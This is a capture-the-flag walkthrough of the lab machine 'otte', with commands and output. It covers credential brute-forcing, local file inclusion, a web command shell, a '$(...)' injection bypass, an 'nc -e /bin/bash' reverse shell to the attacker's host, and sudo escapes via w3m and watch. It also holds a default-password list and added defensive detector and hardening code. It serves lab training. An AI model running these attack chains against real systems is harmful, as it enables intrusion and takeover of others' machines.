49.otte

1. Basic information

2. Information gathering

┌──(root㉿kali)-[~/Desktop/hmv/otte]
└─# nmap 192.168.56.27 -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-27 21:48 EST
Nmap scan report for 192.168.56.27
Host is up (0.00087s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:84:B9:A1 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 2.47 seconds

2.1. FTP anonymous login

┌──(root㉿kali)-[~/Desktop/hmv/otte]
└─# ftp 192.168.56.27
Connected to 192.168.56.27.
220 ProFTPD Server (Debian) [::ffff:192.168.56.27]
Name (192.168.56.27:root): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
226 Transfer complete
ftp> ls -la
229 Entering Extended Passive Mode (|||64320|)
150 Opening ASCII mode data connection for file list
drwxr-xr-x   2 ftp      ftp          4096 May 15  2021 .
drwxr-xr-x   2 ftp      ftp          4096 May 15  2021 ..
-rw-r--r--   1 ftp      ftp            89 May 15  2021 note.txt
226 Transfer complete
ftp> get note.txt
local: note.txt remote: note.txt
229 Entering Extended Passive Mode (|||5844|)
150 Opening BINARY mode data connection for note.txt (89 bytes)
    89      250.47 KiB/s
226 Transfer complete
89 bytes received in 00:00 (92.55 KiB/s)
ftp> exit
221 Goodbye.

┌──(root㉿kali)-[~/Desktop/hmv/otte]
└─# cat note.txt
Hi thomas ! I put on you personal folder the php code you asked me !

See you later +++

This gives us the username thomas and tells us that there is a PHP file in his personal folder.

2.2. Brute-forcing the website login password

The website requires authentication.

Note

Because this box is a bit old and was made by a non-Chinese author, the login prompt dialog here is missing its prompt text; an older browser is needed to display it.

Here I share a browser that does display the prompt text:
https://www.playbook.com/s/yurain/au1fnEHuEk3DvD7zKVV4K9d8
Visiting the site gives us the prompt "Siemens - Root authentification"
So this is very likely a Siemens device default username and password.
Common device default credentials can be looked up here (the domestic database is more complete; I tried the Siemens entries and the correct one was not in there).
Later I found a commonly used table of Siemens default credentials here:
https://www.192-168-1-1-ip.co/router/siemens/siemens/17622/

Username Password
admin admin
(blank) admin
admin (blank)
(blank) (blank)
admin
superuser admin
31994 31994
login admin
(blank) 0000
(blank)
Administrator Password
WinCCAdmin 2WSXcder
(blank) uboot
Administrator Administrator
admin BSNL1234
Level 2 OEM 6000
4712
admin pwp
SKY_FOX
(blank) 123456
admin
2 2
254 admin
(blank) SKY_FOX
Hardcoded password Basisk
user user
root zP2wxY4uE
642935177
basisk basisk
poll tech
123456

A quick Burp brute-force gives the password; the payload has to be base64-encoded here, since Basic auth sends user:password as base64.
Decoded, the password is root:zP2wxY4uE
After logging in we get an image.
The image does not hide anything.

2.3. Directory brute-forcing

The brute-force command here also needs Basic authentication.

┌──(root㉿kali)-[~/Desktop/hmv/otte]
└─# gobuster dir -U root -P zP2wxY4uE -u http://192.168.56.27 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x php
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.27
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Auth User:               root
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 278]
/index.php            (Status: 200) [Size: 28]
/image                (Status: 200) [Size: 47076]
/config.php           (Status: 200) [Size: 0]
/thinkgeek.php        (Status: 200) [Size: 28]

This gives us a path, thinkgeek.php; visiting it still shows the same picture as the home page.

┌──(root㉿kali)-[~/Desktop/hmv/otte]
└─# curl http://192.168.56.27/thinkgeek.php -H "Authorization: Basic cm9vdDp6UDJ3eFk0dUU"
<img src="image.jpg" alt="">

2.4. Parameter brute-forcing

Use arjun to brute-force the parameter; it finds file.

┌──(root㉿kali)-[~/Desktop/hmv/otte]
└─# arjun -u http://192.168.56.27/thinkgeek.php --headers "Authorization: Basic cm9vdDp6UDJ3eFk0dUU"
    _
   /_| _ '
  (  |/ /(//) v2.2.7
      _/

[*] Scanning 0/1: http://192.168.56.27/thinkgeek.php
[*] Probing the target for stability
[*] Analysing HTTP response for anomalies
[*] Logicforcing the URL endpoint
[] parameter detected: file, based on: body length
[+] Parameters found: file

Judging from the parameter name, this is most likely an LFI (local file inclusion).

┌──(root㉿kali)-[~/Desktop/hmv/otte]
└─# curl http://192.168.56.27/thinkgeek.php?file=../../../../../../etc/passwd -H "Authorization: Basic cm9vdDp6UDJ3eFk0dUU"
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
thomas:x:1000:1000:thomas,,,:/home/thomas:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
mysql:x:106:113:MySQL Server,,,:/nonexistent:/bin/false
proftpd:x:107:65534::/run/proftpd:/usr/sbin/nologin
ftp:x:108:65534::/srv/ftp:/usr/sbin/nologin
laetitia:x:1001:1001:,,,:/home/laetitia:/bin/bash
cedric:x:1002:1002:,,,:/home/cedric:/bin/bash

Testing confirms it is indeed an LFI.

I then tried to read the private keys, but had no permission.
The hint told us that there is an important PHP file in thomas's home directory, so we brute-force its name.

┌──(root㉿kali)-[~/Desktop/hmv/otte]
└─# ffuf -u http://192.168.56.27/thinkgeek.php?file=../../../../../../home/thomas/FUZZ.php -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -H "Authorization: Basic cm9vdDp6UDJ3eFk0dUU" |grep -v "Size: 0"

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.56.27/thinkgeek.php?file=../../../../../../home/thomas/FUZZ.php
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 :: Header           : Authorization: Basic cm9vdDp6UDJ3eFk0dUU
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

shell                   [Status: 200, Size: 20, Words: 3, Lines: 3, Duration: 11ms]

Found a shell.php

┌──(root㉿kali)-[~/Desktop/tools]
└─# curl http://192.168.56.27/thinkgeek.php?file=../../../../../../../home/thomas/shell.php -H "Authorization: Basic cm9vdDp6UDJ3eFk0dUU"
Have fun !<br><br>

Now brute-force its parameter.

┌──(root㉿kali)-[~/Desktop/hmv/otte]
└─# ffuf -u "http://192.168.56.27/thinkgeek.php?file=../../../../../../home/thomas/shell.php&FUZZ=whoami"  -w /usr/share/wordlists/parameter.txt -H "Authorization: Basic cm9vdDp6UDJ3eFk0dUU" |grep -v "Size: 20"

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.56.27/thinkgeek.php?file=../../../../../../home/thomas/shell.php&FUZZ=whoami
 :: Wordlist         : FUZZ: /usr/share/wordlists/parameter.txt
 :: Header           : Authorization: Basic cm9vdDp6UDJ3eFk0dUU
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

file                    [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 3ms]
command                 [Status: 200, Size: 29, Words: 3, Lines: 4, Duration: 398ms]
:: Progress: [5846/5846] :: Job [1/1] :: 956 req/sec :: Duration: [0:00:06] :: Errors: 0 ::

Note

Since the parameter file is already in use, a second parameter can only be brute-forced by appending it with &.
Also arjun does not seem able to brute-force a second parameter in this situation, so I chose ffuf here.

The parameter found is command

┌──(root㉿kali)-[~/Desktop/hmv/otte]
└─# curl "http://192.168.56.27/thinkgeek.php?file=../../../../../../../home/thomas/shell.php&command=whoami" -H "Authorization: Basic cm9vdDp6UDJ3eFk0dUU"
Have fun !<br><br>

www-data
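
From the defender's side, the file= include and the chained command= parameter leave a clear trace in the web server's access log. The following is an added example, not part of the original writeup: it runs a small traversal/RCE-chain detector over constructed Apache-style log lines modelled on the requests above (the log lines, regexes and function names are my assumptions).

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Apache access-log lines modelled on the requests in this writeup
# (the thinkgeek.php file= include and the chained command= parameter).
LOG = """\
192.168.56.6 - root [28/Dec/2024:13:05:11 +0000] "GET /thinkgeek.php HTTP/1.1" 200 28
192.168.56.6 - root [28/Dec/2024:13:06:02 +0000] "GET /thinkgeek.php?file=../../../../../../etc/passwd HTTP/1.1" 200 2001
192.168.56.6 - root [28/Dec/2024:13:07:40 +0000] "GET /thinkgeek.php?file=..%2F..%2Fhome%2Fthomas%2Fshell.php&command=whoami HTTP/1.1" 200 29
192.168.56.6 - root [28/Dec/2024:13:08:13 +0000] "GET /image HTTP/1.1" 200 47076
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
TRAVERSAL_RE = re.compile(r"(^|/)\.\.(/|$)")


def analyse(line: str):
    """Return {path, status, findings} for one log line, or None if it does
    not look like a request line. Findings: any parameter whose (double-)
    decoded value walks up the tree or names an absolute path, and the
    file=...&command=... combination that turns the include into RCE."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    params = parse_qs(url.query, keep_blank_values=True)  # decodes %2F once
    findings = []
    for name, values in params.items():
        for value in values:
            decoded = unquote(value)  # second decode catches %252E%252E%252F
            if TRAVERSAL_RE.search(decoded) or decoded.startswith("/"):
                findings.append(f"traversal in {name}={decoded}")
    if "file" in params and "command" in params:
        findings.append("command= chained onto file= include")
    return {"path": url.path, "status": int(m.group("status")), "findings": findings}


def suspicious_requests(log: str) -> list:
    """Every request line that produced at least one finding."""
    return [r for r in map(analyse, log.splitlines()) if r and r["findings"]]
```

A hit on the second pattern (an include parameter plus a second parameter on the same request) is the strongest signal here, since a plain traversal alone may only be a file read.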

Then just spawn a reverse shell.

┌──(root㉿kali)-[~/Desktop/hmv/otte]
└─# pwncat-cs -lp 1234

[01:15:41] Welcome to pwncat 🐈!                                                                  __main__.py:164
[01:17:04] received connection from 192.168.56.27:44386                                                bind.py:84
[01:17:04] 192.168.56.27:44386: registered new host w/ db                                          manager.py:957
(local) pwncat$
(remote) www-data@otte:/var/www/html$ whoami
www-data

3. Privilege escalation to thomas

3.1. Recovering the file signature

There is a hint in thomas's directory:

(remote) www-data@otte:/home/thomas$ cat nightmare.txt
who is the son of a bitch who replaced the signature on my file with fucking XXX?! I need to find the original signature!

This means we need to restore a file's signature, and that file is important_file in the same directory.

(remote) www-data@otte:/home/thomas$ head important_file
00000000: XXXXXXXXXXXXXXXX 0000 000d 4948 4452  .XXX........IHDR
00000010: 0000 012c 0000 012c 0806 0000 0079 7d8e  ...,...,.....y}.
00000020: 7500 0000 1b74 4558 7443 7265 6174 696f  u....tEXtCreatio
00000030: 6e20 5469 6d65 0031 3632 3130 3037 3337  n Time.162100737
00000040: 3935 3239 15fc b9e2 0000 37e9 4944 4154  9529......7.IDAT
00000050: 78da ed9d 8bab 7ecf 55de f38f 168a 2085  x.....~.U..... .
00000060: 2214 410a 2208 2294 8214 4428 8582 286a  ".A."."...D(..(j
00000070: bd50 898a d6b6 62b0 28a2 a849 9a18 a3b9  .P....b.(..I....
00000080: 7889 a931 3626 8d9a 8ba6 8947 3e5f ddb8  x..16&.....G>_..
00000090: ddee 99f5 ccac 35b3 67ef 773d 3090 7c7f  ......5.g.w=0.|.

We can see that the file signature at the start has been replaced with X's.
But anyone who plays CTF misc challenges will notice IHDR on the first line, which appears in PNG images.
So we just need to take any PNG image, extract its leading bytes in hex, and put them in place of the X's:
8950 4E47 0D0A 1A0A
Then export it back to a file.

After exporting we get a QR code.
Decoding it gives a URL: https://eqrcode.co/a/SVxQdM
Visiting the URL gives thomas's password: thomas:youareonthegoodwaybro
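
The repair above can be done and checked in a few lines. This is an added example, not code from the writeup: it reverses an xxd-style dump of the kind shown for important_file (the sample below is constructed from the first three dump lines on the page), writes the PNG signature over the X'd-out bytes, and then verifies the IHDR chunk's CRC-32 so that the "this is a PNG" guess is confirmed rather than assumed. Function names are mine.

```python
import struct
import zlib

PNG_SIGNATURE = bytes.fromhex("89504e470d0a1a0a")  # the 8 bytes the X's replaced

# Constructed sample in the shape of the page's important_file: an xxd-style
# dump whose first 8 bytes were overwritten with 'X'. Only the first three
# lines are reproduced; the IHDR chunk and its CRC are as on the page.
DUMP = """\
00000000: XXXXXXXXXXXXXXXX 0000 000d 4948 4452  .XXX........IHDR
00000010: 0000 012c 0000 012c 0806 0000 0079 7d8e  ...,...,.....y}.
00000020: 7500 0000 1b74 4558 7443 7265 6174 696f  u....tEXtCreatio
"""


def xxd_reverse(dump: str) -> bytes:
    """Turn an xxd dump back into bytes (what `xxd -r` does). A byte given as
    'XX' is emitted as 0x00 so every later offset stays where it was."""
    out = bytearray()
    for line in dump.splitlines():
        if ":" not in line:
            continue
        hexarea = line.split(":", 1)[1].split("  ")[0].replace(" ", "")
        for i in range(0, len(hexarea), 2):
            pair = hexarea[i:i + 2]
            out.append(0 if "X" in pair else int(pair, 16))
    return bytes(out)


def restore_png_signature(data: bytes) -> bytes:
    """Overwrite the destroyed first 8 bytes with the PNG signature."""
    return PNG_SIGNATURE + data[8:]


def parse_ihdr(png: bytes) -> dict:
    """Check the signature and the IHDR chunk. The chunk CRC-32 covers chunk
    type and data, so a matching CRC confirms the bytes after the signature
    are intact and the 'this is a PNG' guess was right."""
    if png[:8] != PNG_SIGNATURE:
        raise ValueError("bad PNG signature")
    length, chunk_type = struct.unpack(">I4s", png[8:16])
    if chunk_type != b"IHDR" or length != 13:
        raise ValueError("first chunk is not IHDR")
    body = png[16:16 + length]
    (stored_crc,) = struct.unpack(">I", png[16 + length:20 + length])
    width, height, bit_depth, color_type = struct.unpack(">IIBB", body[:10])
    return {"width": width, "height": height, "bit_depth": bit_depth,
            "color_type": color_type,
            "crc_ok": zlib.crc32(chunk_type + body) == stored_crc}
```

With the complete dump, write restore_png_signature(xxd_reverse(...)) out to a .png file and decode the QR code from that image.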

4. Privilege escalation to laetitia

thomas@otte:~$ sudo -l
Matching Defaults entries for thomas on otte:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User thomas may run the following commands on otte:
    (laetitia) NOPASSWD: /usr/bin/python3 /home/laetitia/simpler.py *

4.1. Code review

Reading the code, exec_ping has an exploitable spot:

thomas@otte:~$ cat /home/laetitia/simpler.py
...
def exec_ping():
    forbidden = ['&', ';', '-', '`', '||', '|']
    command = input('Enter an IP: ')
    for i in forbidden:
        if i in command:
            print('Got you')
            exit()
    os.system('ping ' + command)

$ is not filtered here, so the command substitution syntax $(...) bypasses the blacklist.
First write a reverse-shell script:

thomas@otte:/tmp$ echo 'nc -e /bin/bash 192.168.56.6 2233' >shell.sh

Then run the script to get a reverse shell as laetitia:

thomas@otte:/tmp$ sudo -u laetitia /usr/bin/python3 /home/laetitia/simpler.py -p
***********************************************
     _                 _
 ___(_)_ __ ___  _ __ | | ___ _ __ _ __  _   _
/ __| | '_ ` _ \| '_ \| |/ _ \ '__| '_ \| | | |
\__ \ | | | | | | |_) | |  __/ |_ | |_) | |_| |
|___/_|_| |_| |_| .__/|_|\___|_(_)| .__/ \__, |
                |_|               |_|    |___/
                                @ironhackers.es

***********************************************

Enter an IP: $(bash /tmp/shell.sh)

┌──(root㉿kali)-[~/Desktop/hmv/otte]
└─# pwncat-cs -lp 2233

(local) pwncat$
(remote) laetitia@otte:/tmp$ whoami
laetitia
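
The root cause in exec_ping is a substring blacklist in front of os.system(), which hands the string to a shell. The following added example (mine, not from the box's simpler.py) puts the page's blacklist beside an allowlist fix: parse the input as an IP address with the standard ipaddress module and run ping from an argv list with no shell at all, so metacharacters are never interpreted. Function names are assumptions.

```python
import ipaddress
import subprocess

# The blacklist from the page's simpler.py, reproduced for comparison.
FORBIDDEN = ['&', ';', '-', '`', '||', '|']


def passes_blacklist(value: str) -> bool:
    """The original check: reject only if a listed substring occurs. Whatever
    the list forgot ($(...), newline, <, >) goes straight to os.system()."""
    return not any(bad in value for bad in FORBIDDEN)


def validate_ip(value: str) -> str:
    """Allowlist instead of blacklist: the input must parse as an IPv4 or IPv6
    address. Returns the normalised address, raises ValueError otherwise."""
    return str(ipaddress.ip_address(value.strip()))


def build_ping_argv(value: str) -> list:
    """Build ping's argument vector. Without a shell, a metacharacter in the
    argument is just text ping receives, never something that gets executed."""
    return ["ping", "-c", "1", validate_ip(value)]


def exec_ping_hardened(value: str) -> int:
    """Replacement for the page's exec_ping() (which reads value via input()):
    validate, then run with an argv list and no shell=True. Returns ping's
    exit status, or 1 without running anything when validation fails."""
    try:
        argv = build_ping_argv(value)
    except ValueError:
        print('Got you')
        return 1
    return subprocess.run(argv, check=False).returncode
```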

5. Privilege escalation to cedric

(remote) laetitia@otte:/tmp$ sudo -l
Matching Defaults entries for laetitia on otte:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User laetitia may run the following commands on otte:
    (cedric) NOPASSWD:  

There is a file read here (w3m),
but w3m's interactive mode can execute commands,
so we use interactive mode to escalate.

(remote) laetitia@otte:/home/laetitia/.w3m$ sudo -u cedric /usr/bin/w3m "/etc/passwd"
Once inside, run !bash
cedric@otte:/home/laetitia/.w3m$ whoami
cedric

(remote) cedric@otte:/home/cedric$ cat user.txt
e1e4e2e00a00df7b40c5436155ab4996

6. Privilege escalation to root

After getting in, there is an id_rsa:

(remote) cedric@otte:/home/cedric$ ls
id_rsa  user.txt

It turns out to be root's private key:

┌──(root㉿kali)-[~/Desktop/hmv/otte]
└─# chmod 600 id_rsa

┌──(root㉿kali)-[~/Desktop/hmv/otte]
└─# ssh-keygen -y -f id_rsa
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzc3fvk0OLTl7Mx2VF6cr9A6AfAIV05BjNmrBnJ+lxNtP4fYzYjnvxNDtv3lbeLHsyuZD6C29nPCpvi7hUdX5tjjt5e8aFcH5Wtu1zOouXjs8RV6tCUBp433igqXwbVl1WKeQ7vYO+yuqBBacJNkXPU0e0ROwXBFWDklOYwSvnRW6Yi3VK7MQueQgP+3+ajLnwpmpOxndi3hCNwOppUlDNhEm6f8rJ4zatAXPP5SMIp6/P3c98Qjn0zHdkI7t3kL6HU5uGwQsQi3WJGz18YavwyjXHSlQLlwhTDGgOSQ6zpx4WJ7iY7mK/dL1c7CNoF115rpgqHyFJQCdlvsgIJ9jN root@otte

Just SSH in with it.

root@otte:~# cat root.txt
84decf19261819687b63c8210cd28f7c

6.1. Another way to escalate to root

(remote) cedric@otte:/home/cedric$ sudo -l
Matching Defaults entries for cedric on otte:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User cedric may run the following commands on otte:
    (ALL : ALL) NOPASSWD: /usr/bin/mmwatch

mmwatch is actually a Python script that calls the watch program, so we can escalate with it using the watch privilege-escalation method.

sudo -u root mmwatch  -x "sh -c 'reset; exec sh 1>&0 2>&0'"
(remote) root@otte:/home/cedric$ id
uid=0(root) gid=0(root) groups=0(root)